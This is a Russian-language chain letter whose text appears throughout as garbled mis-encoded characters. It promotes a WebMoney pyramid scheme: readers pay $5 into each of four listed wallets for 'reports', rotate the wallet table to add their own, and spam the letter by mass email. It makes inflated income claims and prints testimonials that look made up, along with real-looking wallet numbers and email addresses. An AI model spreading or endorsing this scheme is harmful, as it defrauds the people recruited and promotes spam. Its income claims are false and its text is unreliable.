Âîçüìèòå ðó÷êó è ïîñ÷èòàéòå, ÷òî ìîæåò èç ýòîãî ïîëó÷èòüñÿ, åñëè Âû ýòî ïîïðîáóåòå. Âîçüìèòå ñàìûé ïëîõîé âàðèàíò, íî è â ýòîì ñëó÷àå ó âàñ áóäåò ìíîãî äåíåã.  ñàìîì õóäøåì ñëó÷àå ïîëó÷èòå ñâîþ èíâåñòèöèþ íàçàä. Âñå ñîìíåíèÿ, êîòîðûå ó âàñ åñòü, èñ÷åçíóò, êîãäà ïîëó÷èòå ñâîé ïåðâûé çàêàç. ÝÒÎ ÄÅÉÑÒÂÓÅÒ!!!!!

Jody Jacobs, Richmond,VA.

À ÒÅÏÅÐÜ, ÂÎÒ ÝÒÀ ÏÅÐÂÎÑÕÎÄÍÀß ÏÐÎÃÐÀÌÌÀ, ÊÎÒÎÐÀß ÂÀÌ ÇÀÐÀÁÎÒÀÅÒ ÒÛÑß×È ÄÎËËÀÐÎÂ!!!!!

************************************************************

ÈÍÑÒÐÓÊÖÈß : Ýòîò ìåòîä çàðàáîòêà äåíåã íà ñàìîì äåëå ÄÅÉÑÒÂÓÅÒ ÍÀ 100%, ÊÎÃÄÀ ÓÃÎÄÍÎ, ÃÄÅ ÓÃÎÄÍÎ. ß óâåðåí, ÷òî Âû ñìîæåòå çàðàáîòàòü áîëåå 50.000,- USD â ïîñëåäóþùèå 90 äíåé. Ïåðåä òåì êàê ñêàçàòü "ãëóïîñòü..." ïîæàëóéñòà ïðî÷èòàéòå âíèìàòåëüíî è âíèêíèòå â ñóòü ýòîé ïðîãðàììû. Ýòî íå öåïíîå ïèñüìî, à îòëè÷íàÿ ëåãàëüíàÿ âîçìîæíîñòü çàðàáîòàòü äåíüãè.  ÷åì ñìûñë? Òàê êàê è â ëþáîé multi-level ñõåìå, òîðãîâëÿ ñòðîèòñÿ íà ïðèâëå÷åíèè íîâûõ ïàðòíåðîâ è ïðîäàæå ñâîèõ òîâàðîâ. ÇÀÊÀÇÛ Ê ÂÀÌ ÏÐÈÕÎÄßÒ È ÂÛÏÎËÍßÞÒÑß ÏÎ E-MAIL, ïîýòîìó íå âîçíèêàåò ëè÷íîãî êîíòàêòà. Äåëàåòñÿ âñå äîìà èëè â ó÷ðåæäåíèè. Ýòî ñàìàÿ áîëüøàÿ multi-level âîçìîæíîñòü íà ñâåòå!!!!! È ÝÒÎ ÍÅ ÏÐÅÓÂÅËÈ×ÅÍÈÅ!!

 

Ñóùåñòâóåò äâà îñíîâíûõ ìåòîäà äëÿ ñòðîèòåëüñòâà âàøèõ íèæíèõ óðîâíåé:

Ìåòîä #1- ÏÎÑÛËÊÀ ÌÀÑÑÎÂÎÉ E-MAIL ÐÅÊËÀÌÛ

Ïðåäïîëîæèì, íàïðèìåð, ÷òî Âû õîòèòå íà÷àòü ñ ìàëîãî êîëè÷åñòâà, òîëüêî äëÿ òîãî, ÷òîáû ïîñìîòðåòü êàê ýòî äåéñòâóåò. Äîïóñòèì, ÷òî Âû è âñå âîâëå÷åííûå Âàìè êîìïàíüîíû ïîøëåòå òîëüêî 2.000 e-mail (êàæäûé èç Âàñ). Òàêæå ïðåäïîëîæèì, ÷òî ïîëó÷èòå âñåãî 0,5% îòâåòîâ. Åñëè èñïîëüçóåòå õîðîøèé ïåðå÷åíü àäðåñîâ òî 1%. Ïîòîì ìíîãî ëþäåé ðàçîøëþò óæå ñîòíè òûñÿ÷ ýòèõ ïðîãðàìì, áëàãîäàðÿ âàøèì 2.000. Ïðîäîëæèì íàø ïðèìåð, âû ïîñëàëè 2.000 ïðîãðàìì. Èç 0,5% îòâåòîâ ýòî òîëüêî 10 çàêàçîâ íà REPORT #1. Ýòèõ äåñÿòü ÷åëîâåê ïîñëàëî 20.000 ïðîãðàìì, ÷òî ïðè 0,5% - óæå 100 çàêàçîâ íà REPORT #2. Êàæäûé èç ýòèõ 100 ïîñëàëè ïî 2.000 ïðîãðàìì, à Âû ïîëó÷èëè 1.000 çàêàçîâ íà REPORT #3, à åñëè êàæäûé èç ýòèõ 1.000 ïîøëåò 2.000 ñâîèõ ïðîãðàìì, òàê ïðè 0,5% ïîëó÷èòå 10.000 çàêàçîâ íà REPORT #4. À ýòî 10.000 õ 5 = 50.000 USD â íàëè÷íîñòè!!!!! Âàø êîíå÷íûé çàðàáîòîê â ýòîì ñëó÷àå áóäåò: 50+500+5.000+50.000 = 55.550,- USD!!!!!!! Ïîìíèòå, ÷òî ýòî ïðåäïîëîæåíèå äëÿ 1990 ÷åëîâåê. Òå, êîòîðûå íå çàõîòÿò ó÷àñòâîâàòü, ýòó âîçìîæíîñòü óäàëÿò, è íè÷åãî íå ñëó÷èòñÿ! Ïîïðîáóéòå ïîäóìàòü ìèíóòêó! À ÷òî åñëè êàæäûé ïîøëåò 100.000 ïðîãðàìì âìåñòî 2.000 ?! Âåðüòå ìíå, ÷òî ëþäè ýòî ñäåëàþò, âîçìîæíî è áîëüøå! Ìåæäó ïðî÷èì, Âàø ôèíàíñîâûé âêëàä ÿâëÿåòñÿ ìèíèìàëüíûì... Âû óæå èìååòå ïîäêëþ÷åíèå ê Èíòåðíåò, à e-mail - áåñïëàòåí!

REPORT #2 Âàì ïîêàæåò ñàìûå ëó÷øèå ìåòîäû ìàññîâîé ðàññûëêè e-mail è ãäå ìîæíî íàéòè ïåðå÷åíü àäðåñîâ.

ÌÅÒÎÄ #2 - ÁÅÑÏËÀÒÍÀß ÐÅÊËÀÌÀ Â ÈÍÒÅÐÍÅÒÅ

Ðåêëàìà â Èíòåðíåòå ÿâëÿåòñÿ íåòðåáîâàòåëüíîé è ñóùåñòâóåò òûñÿ÷à ÁÅÑÏËÀÒÍÛÕ ìåñò äëÿ ðåêëàìû. Ñêàæåì, íàïðèìåð, ÷òî âû íà÷íåòå ñêðîìíî, òîëüêî äëÿ òîãî, ÷òîáû óçíàòü äåéñòâóåò ëè ýòî. Âàøåé öåëüþ áû áûëî íàéòè âñåãî ëèøü 10 ÷åëîâåê íà ïåðâûé óðîâåíü òî åñòü òåõ, êòî çàêàçàë áû ó Âàñ REPORT#1 (ðàçìåùåíèåì áåñïëàòíûõ îáúÿâëåíèé â Èíòåðíåò ëåãêî íàéòè è áîëüøåå êîëè÷åñòâî çàêàçîâ).

Äàëüøå ïðåäïîëîæèì, ÷òî êàæäûé èç Âàøåé îðãàíèçàöèè íàéäåò òîëüêî 10 ÷åëîâåê. Ïîñìîòðèì íà ïðèìåðå è óâèäèì, ÷òî ïðîèçîéäåò:

  2. 1-é level - âàøèõ 10 êëèåíòîâ ïî 5 USD.............................50,- USD.
  3. 2-é level - ïî 10 êëèåíòîâ îò òåõ 10-òè (5,- USD x 100) ........ 500,- USD.
  4. 3-é level - ýòî óæå 1.000 êëèåíòîâ (5,- USD x 1.000) ........5.000,- USD.
  5. 4-é level - 10.000 êëèåíòîâ (5,- USD x 10.000) ............... 50.000,- USD.

Èòîãî 55.550,- USD.

Ïîìíèòå, ÷òî ýòî òîëüêî ïðèìåð äëÿ 10 êëèåíòîâ. Ìíîãèå ëþäè íàéäóò ñîòíè êëèåíòîâ!!! ÏÎÄÓÌÀÉÒÅ ÎÁ ÝÒÎÌ!!! Âñå, ÷òî âû äîëæíû ñäåëàòü, çà êàæäûå $5 USD, êîòîðûå ïîëó÷èòå â ñâîé êîøåëåê - ýòî ïîñëàòü ïîêóïàòåëþ çàêàçàííûé REPORT. È ÝÒÎ ÂÑÅ!!! ÂÑÅÃÄÀ ÎÒÏÐÀÂËßÉÒÅ ÇÀÊÀÇÛ Â ÒÎÒ ÄÅÍÜ, ÊÎÃÄÀ ÎÍÈ ÏÐÈÉÄÓÒ!!! Ýòî Âàì ãàðàíòèðóåò, ÷òî e-mail, êîòîðûå áóäóò ïîñûëàòü ñ ÂÀØÈÌ èìåíåì, áóäóò áûñòðåå ðàñïðîñòðàíÿòüñÿ, ïîòîìó ÷òî îíè íå ìîãóò áûòü ïîñëàíû ïîêà REPORT's íåò ó âàøåãî çàêàç÷èêà!!!

ÈÒÀÊ, ÄÎÑÒÓÏÍÛÅ REPORT's:

****** Çàêàæè ñåáå êàæäûé èç íèõ ñîãëàñíî íîìåðó è íàçâàíèþ ******

 

ÇÀÊÀÆÈÒÅ ÑÅÁÅ REPORT's ÑÅÉ×ÀÑ !!!

 

Òàáëèöà 1. REPORT's è ðåêâèçèòû ïðîäàâöîâ.

¹ Ïåðå÷åíü REPORT's R- è Z- êîøåëüêè ïðîäàâöà E-mail ïðîäàâöà
1 REPORT #1 "Ðóêîâîäñòâî ïî áåñïëàòíîé è ýôôåêòèâíîé ðåêëàìå â Èíòåðíåò" R871542342557

Z469857407500

 WM_13@yahoo.com
2 REPORT #2 "Ðóêîâîäñòâî ïî ìàññîâîé ðåêëàìíîé ðàññûëêå E-Mail " R803112125203

Z460897718401

 verysimplejob@yahoo.com
3 REPORT #3 "Ñåêðåòû ìíîãîóðîâíåâîãî ìàðêåòèíãà â Èíòåðíåò" R916511407235

Z601004161913

 poul007@narod.ru
4 REPORT #4 "Êàê ñòàòü ìèëëèîíåðîì, èñïîëüçóÿ MLM è Èíòåðíåò" R117465742973

Z095492416150

 asebo@mail.ru

Ñ ëþáûì èç ïðîäàâöîâ âñåãäà ìîæíî ñâÿçàòüñÿ ÷åðåç åãî e-mail. Íî, ïîæàëóéñòà, íå çàãðóæàéòå èõ ëèøíèìè âîïðîñàìè, îíè ìîãóò áûòü î÷åíü çàíÿòû îáðàáîòêîé çàêàçîâ (îñîáåííî íà òðåòüåì è ÷åòâåðòûõ óðîâíÿõ).

ÂÎÒ, ×ÒÎ ÍÓÆÍÎ ÑÄÅËÀÒÜ ÂÀÌ:

1. Ñêîïèðîâàòü ïðîãðàììó WebMoney keeper 2 è ñîçäàòü ñåáå ðóáëåâûé R-êîøåëåê.

Èíñòðóêöèè ïî ðàáîòå ñ êîøåëüêîì è èíôîðìàöèÿ îá ýòîé ñèñòåìå ïëàòåæåé

íà ñàéòå http://www.webmoney.ru

2. Ïîïîëíèòü ÑÂÎÉ êîøåëåê ðóáëåâûì ýêâèâàëåíòîì $20 + 3% ïî êóðñó ÖÁ, âûáðàâ

ëþáîé èç äîñòóïíûõ íà http://www.webmoney.ru/rus/perevods.htm ñïîñîáîâ ïåðåâîäà.

3. Ïîñëå ïîñòóïëåíèÿ äåíåã â âàø êîøåëåê, çàêàæèòå ñåáå âñå ÷åòûðå REPORT's

(èç ïåðå÷íÿ Òàáëèöû 1), ïóòåì ïåðåâîäà WebMoney èç ñâîåãî êîøåëüêà â êîøåëåê

ïðîäàâöà, ñóììû $5 ÑØÀ ïî êóðñó ÖÁ, çà êàæäûé REPORT. Îáÿçàòåëüíî, óêàæèòå

â ïîëå êîììåíòàðèÿ íîìåð REPORT è îáðàòíûé e-mail àäðåñ.

Ïðèìåð: REPORT#1 xxxxxx@xxxx.xxx

(Ïîäòâåðäèòå îïëàòó ïî e-mail)

4. Â Òàáëèöå 1, óäàëèòå íîìåð êîøåëüêà èç ñòðîêè 4 è ïåðåìåñòèòå íà åãî ìåñòî

íîìåð êîøåëüêà èç ñòðîêè 3. Çàòåì, ïåðåìåñòèòå íîìåð êîøåëüêà èç ñòðîêè 2

â îñâîáîäèâøååñÿ ìåñòî â ñòîðîêå 3. È, íàêîíåö, ïåðåìåñòèòå íîìåð êîøåëüêà èç

ñòðîêè 1 â ñòðîêó 2.

 îñâîáîäèâøååñÿ ìåñòî â ñòðîêå 1 âñòàâüòå íîìåð ñâîåãî R- êîøåëüêà.

Òåïåðü Âû ñòàëè ïðîäàâöîì REPORT#1.

5. Òîæå ñàìîå ïðîäåëàéòå ñ e-mail àäðåñàìè.

  • ÏÐÈÌÅ×ÀÍÈÅ:

    *Çà êàæäûé REPORT ïåðåâåäèòå ðóáëåâûé ýêâèâàëåíò $5 USD ïî êóðñó ÖÁ, ñî ñâîåãî êîøåëüêà íà íîìåð êîøåëüêà ïðîäàâöà. (USD ïîòîìó, ÷òî â ýòî âîâëå÷åíû æåëàþùèå ñî âñåãî ñâåòà). Âñå îïåðàöèè îò ñîçäàíèÿ êîøåëüêà äî îïëàòû REPORT's ïðîèçâîäÿòñÿ â ïðîãðàììå WebMoney Keeper.

    *Â êîøåëüêå, äåíüãè õðàíÿòñÿ â âèäå óñëîâíûõ åäèíèö (WebMoney).

    Ïî êóðñó 1WM = 1 ðóá. äëÿ R- êîøåëüêà

    1WM = 1 äîëëàð ÑØÀ äëÿ Z- êîøåëüêà.

    *Êîãäà ñäåëàåòå ñâîé çàêàç, óáåäèòåñü, ÷òî âû çàêàçàëè âñå REPORT. Âñå îíè ïîíàäîáÿòñÿ äëÿ òîãî, ÷òîáû Âû ñîõðàíèëè ó ñåáÿ â êîìïüþòåðå è, ïîòîì, ìîãëè ïðîäàâàòü êîïèè. Âàì äåéñòâèòåëüíî íóæíû âñå ýòè REPORT, èíà÷å ëþäè íå ñìîãóò ñäåëàòü ó âàñ çàêàç, à ñàìîå ãëàâíîå, ýòè REPORT's ñîäåðæàò âàæíóþ èíôîðìàöèþ î òîì, êàê èì äîñòè÷ü óñïåõà!! È ðàçâèâàòü ýòîò áèçíåññ.

    * òå÷åíèè íåñêîëüêèõ äíåé ïîñëå îïëàòû, âû ïîëó÷èòå ÷åòûðå e-mail, â êàæäîì ïî îäíîìó REPORT(ó). Ñîõðàíèòå èõ â âàøåì êîìïüþòåðå (è íà äèñêåòå äëÿ íàäåæíîñòè), ÷òîáû îíè âñåãäà áûëè ãîòîâû ê ïîñûëêå òûñÿ÷àì ëþäåé, êîòîðûå èõ ó âàñ çàêàæóò. Òåïåðü ýòî Âàø òîâàð, ñ ïðàâîì ïðîäàæè!

    • ÂÀÆÍÎ: - íå ìåíÿéòå íîìåðà êîøåëüêîâ, êîòîðûå íàõîäÿòñÿ â ñïèñêå çà êàæäûì èç REPORT's (íèêàêèì ñïîñîáîì), òîëüêî òàê, êàê ýòî óêàçàíî â ïóíêòàõ (1 - 5), èíà÷å ïîòåðÿåòå áîëüøóþ ÷àñòü ñâîèõ äîõîäîâ. Êîãäà ïîéìåòå, êàê ýòî äåéñòâóåò, Âàì ñðàçó ñòàíåò ïîíÿòíî, ïî÷åìó ýòî ïåðåñòàåò äåéñòâîâàòü, êîãäà ÷òî-íèáóäü èçìåíèøü íå ïî ïóíêòàì(1 - 5) . Ïîìíèòå, ýòîò ìåòîä áûë ïðîâåðåí, è åñëè Âû èçìåíèòå åãî, îí ïåðåñòàíåò ðàáîòàòü!!

    Âîçüìèòå ýòîò äîêóìåíò ñ èçìåíåííûì ïåðå÷íåì èìåí è ñ÷åòîâ è ñêîïèðóéòå åãî íà âàø êîìïüþòåð. Òåïåðü âû ãîòîâû ê ðàáîòå è ìîæåòå ðàññûëàòü ýòî ïðåäëîæåíèå â ïîèñêàõ ñâîèõ êëèåíòîâ, íî ïðåäâàðèòåëüíî îáÿçàòåëüíî ïðî÷èòàéòå âñå ÷åòûðå ðóêîâîäñòâà - îíè ñèëüíî ïîìîãóò âàì. Íå äåëàéòå íèêàêèõ èçìåíåíèé â ÷àñòè ÈÍÑÒÐÓÊÖÈÈ!!! Âàø ôèíàíñîâûé âêëàä â äàííîå ïðåäïðèÿòèå ÿâëÿåòñÿ ïðàêòè÷åñêè íè÷òîæíûì (êîíå÷íî æå åñëè âû ìîæåòå ïîçâîëèòü ñåáå èíâåñòèðîâàòü 20,- USD, èëè, íàïðèìåð, ìîæåòå ñëîæèòüñÿ ñ äðóçüÿìè. ×åì áîëüøå áóäåò Âàñ äëÿ ïîñûëêè ðåêëàìû è email, òåì áîëüøå âû èõ ïîøëåòå!. Âû, êîíå÷íî æå, óæå ïîäêëþ÷åíû ê ñåòè Èíòåðíåò è èìååòå áåñïëàòíûé e-mail!  ïîìîùü Âàì ñ âàøèì ìàðêåòèíãîì, ñîçäàíû 4 REPORT(ðóêîâîäñòâà), êîòîðûå âû çàêàçàëè. Îíè ñîäåðæàò ïîëåçíóþ èíôîðìàöèþ, íàïðèìåð, êàê ïîñûëàòü ìàññîâóþ ïî÷òîâóþ ðàññûëêó (e-mail), ãäå íàéòè òûñÿ÷ó âîçìîæíîñòåé ñäåëàòü áåñïëàòíóþ ðåêëàìó è ò.ä. Òàêæå âàì áóäóò äàíû èíôîðìàöèè îá ÈÍÒÅÐÍÅÒ-ÌÀÐÊÅÒÈÍÃ-ÊËÓÁÀÕ. Çäåñü íàéäåòå êîíôåðåíöèþ, ãäå èíòåðíåò-ïðåäïðèíèìàòåëè ñ öåëîãî ñâåòà âçàèìíî îáìåíèâàþòñÿ èíôîðìàöèåé è ñåêðåòàìè óñïåõà. Êëóá òàêæå áåñïëàòíî ïðåäîñòàâëÿåò èíòåðíåòîâûå èíñòðóìåíòû è óñëóãè äëÿ ñîçäàíèÿ ÑÎÁÑÒÂÅÍÍÎÃÎ ÈÍÒÅÐÍÅÒ ÏÐÅÄÏÐÈßÒÈß. Ïîñòàâÿò áåñïëàòíî software äëÿ îòïðàâëåíèÿ ìàññîâûõ e-mail è êàæäûé äåíü 1.000.000 íîâûõ e-mail àäðåñîâ. Òàêæå Âàì ïîñîâåòóþò, ãäå íàéòè áåñïëàòíóþ WEB ñòðàíèöó, êàê ïîëó÷èòü TOP îöåíêó â ïîèñêîâûõ ïðîãðàììàõ äëÿ Âàøåé ñòðàíèöû, êàê ïðîäàòü Âàø ïðîäóêò ïðè ïîìîùè ðåêëàìû, áþëëåòåíåé, áàííåðîâ è ìíîãî äðóãèõ ñîâåòîâ. Àäðåñ IMR: http://www.marketingontheweb.net Ïðèëîæåíèå àäðåñîâ ñî ñïèñêàìè è ïîèñêîâûìè ïðîãðàììàìè e-mail àäðåñîâ:

    http://www.whowhere.lycos.com/Email

    http://www.infospace.com/info/email1.htm

    !!! ÎÁßÇÀÒÅËÜÍÎ ÏÐÎÂÅÐÜÒÅ ÏÐÀÂÈËÜÍÎÑÒÜ ÈÇÌÅÍÅÍÈß ÒÀÁËÈÖÛ !!!

    Ïðèáëèçèòåëüíî 50.000 íîâûõ ëþäåé ïîäêëþ÷àþòñÿ ê Èíòåðíåòó êàæäûé ìåñÿö!

  • Ïðîâåðüòå, îñîáåííî âíèìàòåëüíî, ïðàâèëüíîñòü óêàçàíèÿ íîìåðà êîøåëüêà ïðè ïåðåâîäå. Ýòî î÷åíü âàæíî, òàê êàê ïîêà íå çàïëàòèòå ïðàâèëüíî, çàêàç íå ïðèäåò, à Âû íå ïîëó÷èòå ñâîé report. Íàéäèòå âðåìÿ, ÷òîáû âû ñìîãëè ñäåëàòü âñå ïðàâèëüíî è íå òîðîïÿñü, ïîòîìó ÷òî ýòî îñíîâà Âàøåãî áèçíåñà.

    • ************* ÑÎÂÅÒÛ Ê ÓÑÏÅÕÓ ************

    *Ñ×ÈÒÀÉÒÅ ÝÒÎ ÑÂÎÈÌ ÁÈÇÍÅÑÎÌ!!! Áóäüòå áûñòðûìè, ïðîôåññèîíàëüíûìè è ïðèäåðæèâàéòåñü èíñòðóêöèé.

    *Çàêàæèòå ñåáå ÷åòûðå REPORT's ÏÐßÌÎ ÑÅÉ×ÀÑ, ÷òîáû âû èõ èìåëè, êîãäà ê âàì íà÷íóò ïðèõîäèòü çàêàçû, ïîòîìó ÷òî:

    *Êîãäà ïîëó÷èòå $5 ÑØÀ, âû ÄÎËÆÍÛ ïîñëàòü æåëàåìûé ïðîäóêò (REPORT)!

    * ÂÑÅÃÄÀ ÎÒÏÐÀÂËßÉÒÅ ÇÀÊÀÇÛ Â ÒÎÒ ÄÅÍÜ ÊÎÃÄÀ ÎÍÈ ÏÐÈÉÄÓÒ!!!!

    *Áóäüòå òåðïåëèâû è íå ñäàâàéòåñü!! Åñëè áóäåòå òî÷íî èñïîëíÿòü ïðåäïèñàíèÿ, Âàøè

    ðåçóëüòàòû ÁÓÄÓÒ ÓÑÏÅØÍÛÌÈ!!!!

    *À ÃËÀÂÍÎÅ, ÂÅÐÜÒÅ Â ÑÅÁß È ÒÎÌÓ, ×ÒÎ Ó ÂÀÑ ÏÎËÓ×ÈÒÜÑß!!!!!!!

    ************ ÍÀØÈ ÐßÄÛ ÓÑÏÅÕÀ ***********

    Ïðèäåðæèâàéòåñü ýòèõ ðÿäîâ è ó âàñ âñå ïîëó÷èòüñÿ: Åñëè íå ïîëó÷èòå 20 çàêàçîâ íà Report #1 â òå÷åíèè äâóõ íåäåëü, ïðîäîëæàéòå äåëàòü ðåêëàìó è ïîñûëàòü e-mail, äî òåõ ïîð, ïîêà èõ íå ïîëó÷èòå. Ïîòîì âû â òå÷åíèè íåñêîëüêèõ íåäåëü Âû äîëæíû ïîëó÷èòü çàêàçû íà Report #2. Åñëè ýòî íå ïðîèçîéäåò, íå ïåðåñòàâàéòå ïîñûëàòü ðåêëàìó äî òåõ ïîð, ïîêà íå äîñòèãíèòå 100 çàêàçîâ íà Report #2. Êàê òîëüêî ïîëó÷èòå 100 çàêàçîâ íà Report #2, ÌÎÆÅÒÅ ÍÀ×ÀÒÜ ÎÒÄÛÕÀÒÜ, ïîòîìó ÷òî ñèñòåìà â ýòîì ñëó÷àå óæå ðàáîòàåò çà Âàñ à Âàøè äåíüãè áóäóò ïðèõîäèòü ñàìè ïî ñåáå.

    ÝÒÎ ÂÀÆÍÎ ÇÀÏÎÌÍÈÒÜ: Âñåãäà, êîãäà âàøå èìÿ ïðîäâèãàåòñÿ âíèç ïî ñïèñêó, Âû ïîëó÷àåòå çàêàç íà ñëåäóþùèé Report, ïîýòîìó ìîæåòå ñëåäèòü ñâîå ïðîäâèæåíèå, ïî òîìó êàêîé êàêîé Report îò Âàñ çàêàçûâàþò ëþäè! Åñëè ïîæåëàåòå ïîâûñèòü ñâîé äîõîä, òî ïðîñòî ïîñûëàéòå íîâóþ ïàðòèþ e-mail. Òàê Âû íà÷íåòå âåñü ïðîöåññ ñíà÷àëà. ÍÅ ÑÓÙÅÑÒÂÓÅÒ ÍÈÊÀÊÎÉ ÃÐÀÍÈÖÛ ÏÐÈÁÛËÈ, ÊÎÒÎÐÓÞ ÌÎÆÍÎ ÄÎÑÒÈÃÍÓÒÜ Â ÝÒÎÌ ÁÈÇÍÅÑÅ!!! Ïåðåä òåì, êàê ðåøèòå õîòèòå ýòèì çàíèìàòüñÿ èëè íåò, ïðî÷èòàéòå ñëåäóþùèå ôàêòû îá ýòîé ïðîãðàììå:

    1. ÏÐÎÄÀÅÒÅ ÏÐÎÄÓÊÒ, ÏÐÎÈÇÂÎÄÑÒÂÎ ÊÎÒÎÐÎÃÎ ÂÀÌ ÍÈ×ÅÃÎ ÍÅ ÑÒÎÈÒ!
    2. ÏÐÎÄÀÅÒÅ ÏÐÎÄÓÊÒ, ÒÐÀÍÑÏÎÐÒÈÐÎÂÊÀ ÊÎÒÎÐÎÃÎ ÂÀÌ ÍÈ×ÅÃÎ ÍÅ ÑÒÎÈÒ!
    3. ÏÐÎÄÀÅÒÅ ÏÐÎÄÓÊÒ, ÐÅÊËÀÌÀ ÊÎÒÎÐÎÃÎ ÂÀÌ ÍÈ×ÅÃÎ ÍÅ ÑÒÎÈÒ!
    4. ÈÑÏÎËÜÇÓÅÒÅ ÑÈËÓ ÈÍÒÅÐÍÅÒÀ È MULTI-LEVEL MARKETING!
    5. ÂÀØÅÉ ÅÄÈÍÑÒÂÅÍÍÎÉ ÂÛÄÀ×ÅÉ ÊÐÎÌÅ ÍÀ×ÀËÜÍÎÉ ÈÍÂÅÑÒÈÖÈÈ 20,- USD ßÂËßÅÒÑß ÒÎËÜÊÎ ÂÀØÅ ÂÐÅÌß!
    6. ÂÅÑÜ ÇÀÐÀÁÎÒÎÊ ÊÎÒÎÐÛÉ ÂÛ ÏÎËÓ×ÈÒÅ ßÂËßÅÒÑß ×ÈÑÒÎÉ ÏÐÈÁÛËÜÞ!
    7. ÝÒÀ ÏÐÎÃÐÀÌÌÀ ÍÀÂÑÅÃÄÀ ÈÇÌÅÍÈÒ ÂÀØÓ ÆÈÇÍÜ!

     

    ***** ÎÏÛÒ ÄÐÓÃÈÕ *****

    Ýòà ïðîãðàììà äåéñòâóåò, íî âû äîëæíû òî÷íî èñïîëíÿòü èíñòðóêöèè! ÃËÀÂÍÎÅ ÍÅ ÏÎÌÅÙÀÉÒÅ ÂÀØÅ ÈÌß ÍÀ ÄÐÓÃÓÞ ÏÎÇÈÖÈÞ, ÝÒÎ ÎÁÎÉÄÅÒÑß ÂÀÌ ÁÎËÜØÎÉ ÏÎÒÅÐÅÉ ÄÅÍÅÃ, ÝÒÎ ÏÐÎÑÒÎ ÍÅ ÄÅÉÑÒÂÓÅÒ!!!

    ß - ðåàëüíîå äîêàçàòåëüñòâî ðàáîòîñïîñîáíîñòè ýòîãî áèçíåñà. Ýòî äåéñòâèòåëüíî ïðåâîñõîäíàÿ âîçìîæíîñòü, òàê ðåàëüíî è ëåãêî çàðàáîòàòü äåíüãè ñ ìèíèìàëüíûì âêëàäîì. Åñëè ðåøèòåñü ýòî ïîïðîáîâàòü, ïðèäåðæèâàéòåñü èíñòðóêöèé ïðîãðàììû è áóäåòå íà ëó÷øåé äîðîãå ê ôèíàíñîâîé íåçàâèñèìîñòè.

    Steven Bardfield, Portland, OR

    ************************************************************

    Ýòà ïðîãðàììà äåéñòâèòåëüíî äåéñòâóåò. Æèâó íå â Àìåðèêå, à â Åâðîïå è ñíà÷àëà ÿ áîÿëñÿ, íå áûë óâåðåí, äåéñòâèòåëüíî ëè ýòî äåéñòâóåò, à ïîòîìó, íå îòíîñèëñÿ ê ýòîìó ñåðüåçíî. À ïîòîì ñêàçàë ñåáå: "À ïî÷åìó íåò?". Ñîçäàë êîøåëåê, ïîïîëíèë åãî , è ñäåëàë ïåðåâîä, çàêàçàâ ñåáå ÷åòûðå Reporty.  òå÷åíèè 5-è äíåé ïîëó÷èë èõ âñåõ ïî e-mail.

    Äîëüøå âñåãî ïðèøëîñü æäàòü Report #4. Íî ýòî è ïîíÿòíî, âåäü ó ïðîäàâöà ýòîãî, ïîñëåäíåãî óðîâíÿ, òûñÿ÷è çàêàçîâ. Âñå ñäåëàë òî÷íî ïî èíñòðóêöèè (÷òîáû áûòü óâåðåííûì, åñëè ýòî äåëî íå çàðàáîòàåò, òî ýòî íå ïðè÷èíà ìîåé îøèáêè) è æäàë. ß âíèìàòåëüíî ïðî÷èòàë âñå ïîëó÷åííûå ðóêîâîäñòâà, à êîãäà óçíàë, êàê âñå íàäî äåëàòü, íà÷àë ñâîé áèçíåñ. ß èñêàë àäðåñà âåçäå è ñäåëàë ñåáå äëèííûé ñïèñîê (ìíå ýòî áûëî äåéñòâèòåëüíî èíòåðåñíî, ýòî áûëî êàê íîâîå õîááè, è ÿ íå ìîã íè÷åãî ïîòåðÿòü), êàê íåíîðìàëüíûé ÿ íà÷àë ïîñûëàòü e-mail ëþäÿì â öåëîì ñâåòå. Äåëàë ÿ ýòî ïîñòîÿííî, è êàæäûé äåíü êîíòðîëèðîâàë ñâîé ïî÷òîâûé ÿùèê è êîøåëåê. Ïðèìåðíî ÷åðåç äåíü íà÷àëè ïðèõîäèòü çàêàçû. Äî ñèõ ïîð ïîìíþ òîò ìîìåíò, êîãäà îáíàðóæèë ïåðâûé çàêàç. Íåêîòîðîå âðåìÿ ÿ ïðîñòî ñòîÿë è íå ìîã äâèãàòüñÿ: "Ýòî ðàáîòàåò! Ýòà øòóêà çàðàáîòàëà ìàòü åå òàê!". Ïðîøó ïðîùåíèÿ çà âûðàæåíèå, íî ß áûë î÷åíü ñ÷àñòëèâ, è íà÷àë ïîñûëàòü åùå áîëüøå e-mail, ïîÿâèëñÿ ñèëüíåéøèé ñòèìóë ê ðàáîòå. Íà ñëåäóþùèé äåíü - ïóñòîé ÿùèê è ñíîâà ÿ ïîäóìàë, ÷òî ýòî íå áóäåò ðàáîòàòü, íî îêàçàëîñü íàîáîðîò. Íà ñëåäóþùèé äåíü ÿ ïîëó÷èë 3 çàêàçà, â òîò æå ìîìåíò ÿ ïîñëàë ëþäÿì èõ reporty, ÷òîáû ìîãëè òîæå áûñòðî çàðàáîòàòü äåíüãè (äëÿ ñåáÿ è äëÿ ìåíÿ). Çà äâå íåäåëè, êàæäûé äåíü ÿ ñèäåë ïðèìåðíî 30 ìèíóò ó êîìïüþòåðà è ïîñûëàë çàêàçû.  òå÷åíèè äâóõ íåäåëü ÿ ïîëó÷èë 29 çàêàçîâ íà Report #1. Ïîòîì çàêàçû ñòàëè ïðèõîäèòü ÷àùå è áûñòðåå, êàæäóþ íåäåëþ ÿ ïîëó÷àë îêîëî ñòà çàêàçîâ, a äåíüãè âñå ïîñòóïàëè íà ìîé ñ÷åò.  öåëîì ÿ çàðàáîòàë îêîëî 64.000,- USD.  ÝÒÎ ÍÅ ÂÎÇÌÎÆÍÎ ÁÛËÎ ÏÎÂÅÐÈÒÜ! Íà ïðîøëîé íåäåëå ÿ êóïèë ñåáå íîâóþ òà÷êó è ýòî áëàãîäàðÿ ïðîãðàììå. Åñëè è òåïåðü Âû íå çíàåòå, ÷òî äåëàòü, òàê ÿ Âàì ãîâîðþ

    Ï_Î_Ï_Ð_Î_Á_Ó_É_Ò_Å è íå ïîæàëååòå. Ýòî Âàø øàíñ, åñëè åãî óïóñòèòå, òàê áóäåòå æàëåòü îá ýòîì äî êîíöà æèçíè!

    Í. Ðåáðîâ, Ðîññèÿ.

    ************************************************************

